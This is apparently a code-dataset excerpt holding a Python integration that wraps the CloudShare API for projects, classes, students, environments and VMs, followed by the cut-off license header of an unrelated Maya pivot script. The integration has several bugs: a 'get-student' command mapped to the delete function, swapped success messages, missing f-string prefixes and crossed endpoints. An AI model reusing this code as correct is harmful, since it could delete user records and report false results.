filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_12903
|
import urllib3
import cloudshare
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
''' IMPORTS '''
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
''' CLIENT CLASS '''
class Client():
def __init__(self, hostname: str, api_id: str = None, api_key: str = None):
self.hostname = hostname
self.apiId = api_id
self.apiKey = api_key
def send_request(self, method: str, path: str, queryParams: dict = None, content: dict = None):
res = cloudshare.req(
hostname=self.hostname,
method=method,
path=path,
apiId=self.apiId,
apiKey=self.apiKey,
queryParams=queryParams,
content=content
)
return res
''' HELPER FUNCTIONS '''
def test_module_command(client, args):
res = client.send_request(
'GET',
'ping'
)
if res.status == 200:
if "result" in res.content and res.content['result'] == "Pong":
return_results('ok')
else:
return_error(res.content)
else:
return_error(res.content)
def get_projects_command(client, args):
queryParams = {
"WhereUserIsProjectManager": True if args.get('WhereUserIsProjectManager', 'false') == 'true' else False,
"WhereUserIsProjectMember": True if args.get('WhereUserIsProjectMember', 'false') == 'true' else False,
"WhereUserCanCreateClass": True if args.get('WhereUserCanCreateClass', 'false') == 'true' else False
}
res = client.send_request(
'GET',
'projects',
queryParams=queryParams
)
if res.status == 200:
md = tableToMarkdown('CloudShare Projects:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting projects - {res.content}")
def get_project_command(client, args):
projectId = args.get('projectId')
res = client.send_request(
'GET',
f'projects/{projectId}'
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare Project {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project - {res.content}")
def get_project_policies_command(client, args):
projectId = args.get('projectId')
res = client.send_request(
'GET',
f'projects/{projectId}/policies'
)
if res.status == 200:
policies = {
"id": projectId,
"Policies": res.content
}
md = tableToMarkdown(f'CloudShare Project Policies for {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=policies if policies else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project policies - {res.content}")
def get_project_blueprints_command(client, args):
projectId = args.get('projectId')
queryParams = {k: v for k, v in args.items() if k != 'projectId'}
res = client.send_request(
'GET',
f'projects/{projectId}/blueprints',
queryParams=queryParams
)
if res.status == 200:
blueprints = {
"id": projectId,
"Blueprints": res.content if res.content else None
}
md = tableToMarkdown(f'CloudShare Project Blueprints for {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=blueprints if blueprints else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project blueprints - {res.content}")
def get_project_blueprint_command(client, args):
projectId = args.get('projectId')
blueprintId = args.get('blueprintId', None)
res = client.send_request(
'GET',
f'projects/{projectId}/blueprints/{blueprintId}'
)
if res.status == 200:
blueprints = {
"id": projectId,
"Blueprints": res.content if res.content else None
}
md = tableToMarkdown(f'CloudShare Blueprint ID {blueprintId} for Project {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=blueprints if blueprints else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project blueprint - {res.content}")
def get_classes_command(client, args):
res = client.send_request(
'GET',
'class'
)
if res.status == 200:
md = tableToMarkdown('CloudShare classes:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving classes - {res.content}")
def get_class_command(client, args):
classId = args.get('classId')
res = client.send_request(
'GET',
f'class/{classId}'
)
if res.status == 200:
md = tableToMarkdown('CloudShare classes:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error finding class - {res.content}")
def delete_class_command(client, args):
classId = args.get('classId')
res = client.send_request(
'DELETE',
f'class/{classId}'
)
if res.status == 200:
return_results("Class {classId} deleted successfully")
else:
return_error(f"Error deleteing class {classId} - {res.content}")
def delete_class_environments_command(client, args):
classId = args.get('classId')
res = client.send_request(
'DELETE',
'class/actions/deleteallenvironments',
content={"id": classId}
)
if res.status == 200:
results = {
"failed": res[0].get('failed', []),
"succeed": res[0].get('succeed', [])
}
for k, v in results.items():
md = tableToMarkdown(f'CloudShare class {classId} environments deletion ({k}):', v)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Actions.Delete.{k}",
outputs_key_field='id',
outputs=v if v else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error deleteing class {classId} environments - {res.content}")
def get_classes_countries_command(client, args):
res = client.send_request(
'GET',
'class/actions/countries',
queryParams={"fullCountriesList": True}
)
if res.status == 200:
md = tableToMarkdown('CloudShare classes countries:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Countries",
outputs_key_field='code',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving countries - {res.content}")
def get_classes_customfields_command(client, args):
projectId = args.get('projectId')
res = client.send_request(
'GET',
'class/actions/customfields',
queryParams={"projectId": projectId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare project {projectId} classes custom fields:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.CustomFields",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving custom fields - {res.content}")
def get_classes_detailed_command(client, args):
classId = args.get('classId')
res = client.get_classes_detailed(
'GET',
'class/actions/getdetailed',
queryParams={"classId": classId}
)
if res.status == 200:
res.content['id'] = classId
md = tableToMarkdown(f'CloudShare class {classId} details:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving details - {res.content}")
def get_classes_instructors_command(client, args):
policyId = args.get('policyId')
res = client.send_request(
'GET',
'class/actions/instructors',
queryParams={"policyId": policyId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare class instructors under policy {policyId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Instructors",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving details - {res.content}")
def create_class_command(client, args):
res = client.send_request(
'POST',
'class',
content={k: True if v == 'true' else False if v == 'false' else v for k, v in args.items()}
)
if res.status == 200:
res.content.extend(args)
md = tableToMarkdown('CloudShare create new class:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error creating new class - {res.content}")
def send_class_invitations_command(client, args):
classId = args.get('classId')
studentIds = args.get('studentIds').replace(" ", "").split(",")
res = client.send_request(
'POST',
'class/actions/sendinvitations',
queryParams={"isMultiple": True},
content={
"classId": classId,
"studentIds": studentIds
}
)
if res.status == 200:
return_results(f"Invitations sent for class {classId} successfully.")
else:
return_error(f"Error sending invitations - {res.content}")
def suspend_class_environments_command(client, args):
classId = args.get('classId')
res = client.send_request(
'PUT',
'class/actions/suspendallenvironments',
content={"id": classId}
)
if res.status == 200:
results = {
"failed": res[0].get('failed', []),
"succeed": res[0].get('succeed', [])
}
for k, v in results.items():
md = tableToMarkdown(f'CloudShare class {classId} environments suspension ({k}):', v)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Actions.Suspend.{k}",
outputs_key_field='id',
outputs=v if v else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error suspending class {classId} environments - {res.content}")
def modify_class_command(client, args):
classId = args.get('classId')
res = client.send_request(
'PUT',
f'class/{classId}',
content={k: True if v == 'true' else False if v == 'false' else v for k, v in args.items() if k != 'classId'}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare modify class {classId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error modifying class {classId} - {res.content}")
def get_students_command(client, args):
classId = args.get('classId')
res = client.send_request(
'GET',
f'class/{classId}/students',
queryParams={
"isFull": True if args.get('isFull', 'false') == 'true' else False
}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare students for class {classId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Students",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving students for class {classId} - {res.content}")
def get_student_command(client, args):
classId = args.get('classId')
studentId = args.get('studentId')
res = client.send_request(
'GET',
f'class/{classId}/students/{studentId}'
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare student {studentId} for class {classId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Students",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving students for class {classId} - {res.content}")
def delete_student_command(client, args):
classId = args.get('classId')
studentId = args.get('studentId')
res = client.send_request(
'DELETE',
f'class/{classId}/students/{studentId}'
)
if res.status == 200:
return_results("Successfully deleted student {studentId} from class {classId}")
else:
return_error(f"Error deleting student {studentId} from class {classId} - {res.content}")
def register_student_command(client, args):
classId = args.get('classId')
res = client.send_request(
'POST',
f'class/{classId}/students',
content={k: v for k, v in args.items() if k != 'classId'}
)
if res.status == 200:
results = {"id": v for k, v in res.contents.items() if k == 'studentId'}
md = tableToMarkdown(f'CloudShare registered student for class {classId}:', results)
command_results = CommandResults(
outputs_prefix="CloudShare.Students",
outputs_key_field='id',
outputs=results if results else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving students for class {classId} - {res.content}")
def modify_student_command(client, args):
classId = args.get('classId')
studentId = args.get('studentId')
res = client.send_request(
'PUT',
f'class/{classId}/students/{studentId}',
content={k: v for k, v in args.items() if k != 'classId' and k != 'studentId'}
)
if res.status == 200:
return_results(f"Student {studentId} modified in class {classId} successfully")
else:
return_error(f"Error modifying student {studentId} for class {classId} - {res.content}")
def get_regions_command(client, args):
res = client.send_request(
'GET',
'regions'
)
if res.status == 200:
md = tableToMarkdown('CloudShare regions:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Regions",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving regions - {res.content}")
def get_timezones_command(client, args):
res = client.send_request(
'GET',
'timezones'
)
if res.status == 200:
md = tableToMarkdown('CloudShare timezones:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Timezones",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving timezones - {res.content}")
def get_envs_command(client, args):
owned = True if args.get('owned', 'false') == 'true' else False
visible = True if args.get('visible', 'false') == 'true' else False
owner_email = args.get('ownerEmail', None)
class_id = args.get('classId', None)
brief = args.get('brief', 'false')
queryParams = dict()
if owned or visible:
owned_visible = list()
if owned:
owned_visible.append('allowned')
if visible:
owned_visible.append('allvisible')
queryParams['criteria'] = ','.join(owned_visible) if owned_visible else None
if owner_email:
queryParams['ownerEmail'] = owner_email
if class_id:
queryParams['classId'] = class_id
if brief:
queryParams['brief'] = brief
res = client.send_request(
'GET',
'envs',
queryParams=queryParams
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environments:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting environments - {res.content}")
def get_env_resources_command(client, args):
envId = args.get('envId')
res = client.send_request(
'GET',
'envs/actions/getextended',
queryParams={"envId": envId}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment {envId} Resources:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.EnvironmentResources",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting environments - {res.content}")
def get_env_extended_command(client, args):
envId = args.get('envId')
res = client.send_request(
'GET',
'envs/actions/getenvresources',
queryParams={"envId": envId}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment {envId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting extended environment {envId} - {res.content}")
def get_env_extended_vanity_command(client, args):
machineVanity = args.get('machineVanity')
res = client.send_request(
'GET',
'envs/actions/getextendedbymachinevanity',
queryParams={"machineVanity": machineVanity}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment {envId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting extended environment - {res.content}")
def get_env_extended_token_command(client, args):
sponsoredLoginToken = args.get('sponsoredLoginToken')
res = client.send_request(
'GET',
'envs/actions/getextendedbytoken',
queryParams={"sponsoredLoginToken": sponsoredLoginToken}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting extended environment - {res.content}")
def get_env_multiple_resources_command(client, args):
res = client.send_request(
'GET',
'envs/actions/getmultipleenvsresources',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment Resources from {args.starttime} to {args.endtime}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.EnvironmentResources",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting environment resources - {res.content}")
def extend_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/extend',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Postpone environment {envId} suspend successful")
else:
return_error(f"Error postponing environment {envId} suspension- {res.content}")
def postpone_env_suspend_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/postponeinactivity',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Extend environment {envId} successful")
else:
return_error(f"Error extended environment {envId} - {res.content}")
def resume_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/resume',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Environment {envId} resumed successfully")
else:
return_error(f"Error resuming environment {envId} - {res.content}")
def revert_env_command(client, args):
envId = args.get('envId')
snapshotId = args.get('snapshotId')
res = client.send_request(
'PUT',
'envs/actions/revert',
queryParams={"envId": envId, "snapshotId": snapshotId}
)
if res.status == 200:
return_results(f"Environment {envId} reverted to snapshot {snapshotId} successfully")
else:
return_error(f"Error reverting environment {envId} to snapshot {snapshotId} - {res.content}")
def suspend_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/suspend',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Environment {envId} suspended successfully")
else:
return_error(f"Error suspending environment {envId} - {res.content}")
def get_env_command(client, args):
envID = args.get('envID')
res = client.send_request(
'GET',
f'envs/{envID}',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment {envID}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error suspending environment {envID} - {res.content}")
def delete_env_command(client, args):
envID = args.get('envID')
res = client.send_request(
'DELETE',
f'envs/{envID}'
)
if res.status == 200:
return_results(f"CloudShare Environment {envID} deleted successfully")
else:
return_error(f"Error deleting environment {envID} - {res.content}")
def create_env_command(client, args):
res = client.send_request(
'POST',
'envs',
content={k: v for k, v in args.items()}
)
if res.status == 200:
res.content['id'] = res.content.get('environmentId')
md = tableToMarkdown('CloudShare Environment Created:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error creating environment - {res.content}")
def modify_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs',
content={"envId": envId}
)
if res.status == 200:
res.content['id'] = res.content.get('environmentId')
md = tableToMarkdown('CloudShare Environment {envId} Modified:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error creating environment - {res.content}")
def delete_vm_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'DELETE',
f'vms/{VmID}'
)
if res.status == 200:
res.content['id'] = res.content.get('environmentId')
return_results(f"CloudShare VM {VmID} deleted successfully")
else:
return_error(f"Error deleting VM {VmID} - {res.content}")
def vm_check_execution_status_command(client, args):
vmID = args.get('vmID')
executionId = args.get('executionId')
res = client.send_request(
'GET',
'vms/actions/checkexecutionstatus',
queryParams={"vmID": vmID, "executionId": executionId}
)
if res.status == 200:
md = tableToMarkdown('VM {vmID} execution {executionId} status:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Executions",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving {vmID} execution {executionId} status - {res.content}")
def vm_get_remote_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'GET',
'vms/actions/getremoteaccessfile',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
res.content['VmID'] = VmID
md = tableToMarkdown('VM {VmID} remote file:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Remote",
outputs_key_field='VmID',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving {VmID} remote file - {res.content}")
def vm_execute_command(client, args):
vmId = args.get('vmId')
res = client.send_request(
'POST',
'vms/actions/executepath',
content={"vmId": vmId}
)
if res.status == 200:
md = tableToMarkdown('VM {vmId} execute task:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Execute",
outputs_key_field='executionId',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error executing command on VM {vmId} - {res.content}")
def vm_modify_hardware_command(client, args):
vmID = args.get('vmID')
res = client.send_request(
'PUT',
'vms/actions/editvmhardware',
content={"vmID": vmID}
)
if res.status == 200:
res.content['id'] = vmID
md = tableToMarkdown('Modify VM {vmID} hardware:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Modify",
outputs_key_field='vmID',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error modifying VM {vmID} - {res.content}")
def reboot_vm_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'PUT',
'vms/actions/reboot',
queryParams={"VmID": VmID}
)
if res.status == 200:
return_results(f"Revert of VM {VmID} successful")
else:
return_error(f"Error reverting VM {VmID} - {res.content}")
def revert_vm_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'PUT',
'vms/actions/revert',
queryParams={"VmID": VmID}
)
if res.status == 200:
return_results(f"Reboot of VM {VmID} successful")
else:
return_error(f"Error reverting VM {VmID} - {res.content}")
def get_cloud_folders_command(client, args):
res = client.send_request(
'GET',
'cloudfolders/actions/getall'
)
if res.status == 200:
md = tableToMarkdown('CloudShare folders:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Folders",
outputs_key_field=['host', 'path'],
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving folders - {res.content}")
def get_env_cloud_folders_command(client, args):
EnvId = args.get('EnvId')
res = client.send_request(
'PUT',
'cloudfolders/actions/mount',
queryParams={"EnvId": EnvId}
)
if res.status == 200:
md = tableToMarkdown('CloudShare folders for env {EnvId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.EnvFolders",
outputs_key_field=['name', 'token'],
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving env {EnvId} folders - {res.content}")
def generate_password_folder_command(client, args):
res = client.send_request(
'PUT',
'cloudfolders/actions/regeneratecloudfolderspassword'
)
if res.status == 200:
md = tableToMarkdown('CloudShare password for folders:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.FoldersPassword",
outputs_key_field='newFtpUri',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error generating password - {res.content}")
def unmount_env_folders_command(client, args):
EnvId = args.get('EnvId')
res = client.send_request(
'PUT',
'cloudfolders/actions/unmount',
queryParams={"EnvId": EnvId}
)
if res.status == 200:
return_results(f"Unmounted env {EnvId} folders successfully")
else:
return_error(f"Error unmounting env {EnvId} folders - {res.content}")
def get_templates_command(client, args):
queryParams = {k: v for k, v in args.items()}
if "skip" in queryParams:
queryParams['skip'] = int(queryParams['skip'])
if "take" in queryParams:
queryParams['take'] = int(queryParams['take'])
res = client.send_request(
'GET',
'templates',
queryParams=queryParams
)
if res.status == 200:
md = tableToMarkdown('CloudShare env templates:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Templates",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving templates - {res.content}")
def get_snapshot_command(client, args):
snapshotID = args.get('snapshotID')
res = client.send_request(
'GET',
f'snapshots/{snapshotID}'
)
if res.status == 200:
md = tableToMarkdown('CloudShare snapshot {snapshotID}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Snapshots",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving snapshot {snapshotID} - {res.content}")
def get_env_snapshots_command(client, args):
envId = args.get('envId')
res = client.send_request(
'GET',
'snapshots/actions/getforenv',
queryParams={"envId": envId}
)
if res.status == 200:
md = tableToMarkdown('CloudShare snapshots for env {envId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Snapshots",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving snapshots for env {envId} - {res.content}")
def mark_default_snapshot_command(client, args):
snapshotID = args.get('snapshotID')
res = client.send_request(
'PUT',
'snapshots/actions/markdefault',
queryParams={"id": snapshotID}
)
if res.status == 200:
return_results("Snapshot {snapshotID} set as default successfully")
else:
return_error(f"Error setting snapshot {snapshotID} as default - {res.content}")
def take_snapshot_env_command(client, args):
envId = args.get('envId')
content = {k: v for k, v in args.items()}
res = client.send_request(
method='GET',
path='snapshots/actions/takesnapshot',
content=content
)
if res.status == 200:
return_results("Snapshot of env {envId} taken successfully")
else:
return_error(f"Error taking snapshot of {envId} - {res.content}")
def get_teams_command(client, args):
res = client.send_request(
'GET',
'teams'
)
if res.status == 200:
md = tableToMarkdown('CloudShare teams:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Teams",
outputs_key_field='Id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving teams - {res.content}")
def invite_user_poc_command(client, args):
content = {k: True if v == 'true' else False if v == 'false' else v for k, v in args.items()}
res = client.send_request(
method='POST',
path='invitations/actions/invitetopoc',
content=content
)
if res.status == 200:
md = tableToMarkdown('CloudShare invite:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Invites",
outputs_key_field='invitationDetailsUrl',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving teams - {res.content}")
def get_poc_invitations_command(client, args):
res = client.send_request(
method='GET',
path='ProofOfConceptInvitations/Rows',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
rows = res.content.get('rows')
md = tableToMarkdown('CloudShare POC invites:', rows)
command_results = CommandResults(
outputs_prefix="CloudShare.POCInvites",
outputs_key_field='id',
outputs=rows if rows else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving invitations - {res.content}")
''' MAIN FUNCTION '''
def main() -> None:
params = demisto.params()
args = demisto.args()
hostname = params.get('hostname')
api_id = params.get('api_id')
api_key = params.get('api_key')
handle_proxy()
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
commands = {
'cloudshare-get-envs': get_envs_command,
'cloudshare-get-projects': get_projects_command,
'cloudshare-get-project': get_project_command,
'cloudshare-get-project-policies': get_project_policies_command,
'cloudshare-get-project-blueprints': get_project_blueprints_command,
'cloudshare-get-project-blueprint': get_project_blueprint_command,
'cloudshare-get-classes': get_classes_command,
'cloudshare-get-class': get_class_command,
'cloudshare-delete-class': delete_class_command,
'cloudshare-delete-class-environemtns': delete_class_environments_command,
'cloudshare-get-classes-countries': get_classes_countries_command,
'cloudshare-get-classes-customfields': get_classes_customfields_command,
'cloudshare-get-classes-detailed': get_classes_detailed_command,
'cloudshare-get-classes-instructors': get_classes_instructors_command,
'cloudshare-create-class': create_class_command,
'cloudshare-send-class-invitations': send_class_invitations_command,
'cloudshare-suspend-class-environments': suspend_class_environments_command,
'cloudshare-modify-class': modify_class_command,
'cloudshare-get-students': get_students_command,
'cloudshare-get-student': delete_student_command,
'cloudshare-register-student': register_student_command,
'cloudshare-modify-student': modify_student_command,
'cloudshare-get-regions': get_regions_command,
'cloudshare-get-timezones': get_timezones_command,
'cloudshare-get-env-resource': get_env_resources_command,
'cloudshare-get-env-extended': get_env_extended_command,
'cloudshare-get-env-extended-vanity': get_env_extended_vanity_command,
'cloudshare-get-env-extended-token': get_env_extended_token_command,
'cloudshare-get-env-multiple-resources': get_env_multiple_resources_command,
'cloudshare-extend-env': extend_env_command,
'cloudshare-postpone-env-suspend': postpone_env_suspend_command,
'cloudshare-resume-env': resume_env_command,
'cloudshare-revert-env': revert_env_command,
'cloudshare-suspend-env': suspend_env_command,
'cloudshare-get-env': get_env_command,
'cloudshare-delete-env': delete_env_command,
'cloudshare-create-env': create_env_command,
'cloudshare-modify-env': modify_env_command,
'cloudshare-delete-vm': delete_vm_command,
'cloudshare-check-vm-execution-status': vm_check_execution_status_command,
'cloudshare-get-vm-remote-access-file': vm_get_remote_command,
'cloudshare-execute-vm-command': vm_execute_command,
'cloudshare-modify-vm-hardware': vm_modify_hardware_command,
'cloudshare-reboot-vm': reboot_vm_command,
'cloudshare-revert-vm': revert_vm_command,
'cloudshare-get-cloud-folders': get_cloud_folders_command,
'cloudshare-get-env-cloud-folders': get_env_cloud_folders_command,
'cloudshare-generate-cloud-folder-password': generate_password_folder_command,
'cloudshare-unmount-env-folders': unmount_env_folders_command,
'cloudshare-get-templates': get_templates_command,
'cloudshare-get-snapshot': get_snapshot_command,
'cloudshare-get-env-snapshots': get_env_snapshots_command,
'cloudshare-mark-default-snapshot': mark_default_snapshot_command,
'cloudshare-take-snapshot-env': take_snapshot_env_command,
'cloudshare-get-teams': get_teams_command,
'cloudshare-invite-user-poc': invite_user_poc_command,
'cloudshare-get-poc-invitations': get_poc_invitations_command
}
client = Client(
hostname,
api_id=api_id,
api_key=api_key
)
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
test_module_command(client, args)
else:
commands[command](client, args)
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
the-stack_106_12904
|
# -= ml_pivot.py =-
# __ by Morgan Loomis
# ____ ___ / / http://morganloomis.com
# / __ `__ \/ / Revision 4
# / / / / / / / 2018-02-17
# /_/ /_/ /_/_/ _________
# /_________/
#
# ______________
# - -/__ License __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Copyright 2018 Morgan Loomis
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# ___________________
# - -/__ Installation __/- - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Copy this file into your maya scripts directory, for example:
# C:/Documents and Settings/user/My Documents/maya/scripts/ml_pivot.py
#
# Run the tool in a python shell or shelf button by importing the module,
# and then calling the primary function:
#
# import ml_pivot
# ml_pivot.ui()
#
#
# __________________
# - -/__ Description __/- - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Change the rotate pivot of animated nodes. This is not a pivot switcher, it
# changes the pivot for the whole animation but preserves position by baking
